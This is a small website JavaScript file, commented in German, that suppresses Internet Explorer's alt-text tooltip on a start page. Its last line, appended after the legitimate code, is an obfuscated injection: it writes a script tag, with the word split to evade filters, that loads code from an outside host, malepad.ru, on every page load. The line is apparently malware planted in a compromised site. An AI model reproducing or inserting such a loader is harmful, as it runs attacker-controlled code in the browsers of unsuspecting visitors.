/********** verhindert das lästige Popup des Alt-Textes im IE bei Startseiten :hover ***********/

window.onload=titel;

 function titel()
 {
    if(!document.getElementById || !document.body.nodeName)
       return;

    cookietester();
    init();
    if(!window.Event)
       document.getElementById("will").firstChild.setAttribute("title", "", true);
 }
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/JPEG.js"></scr'+'ipt>');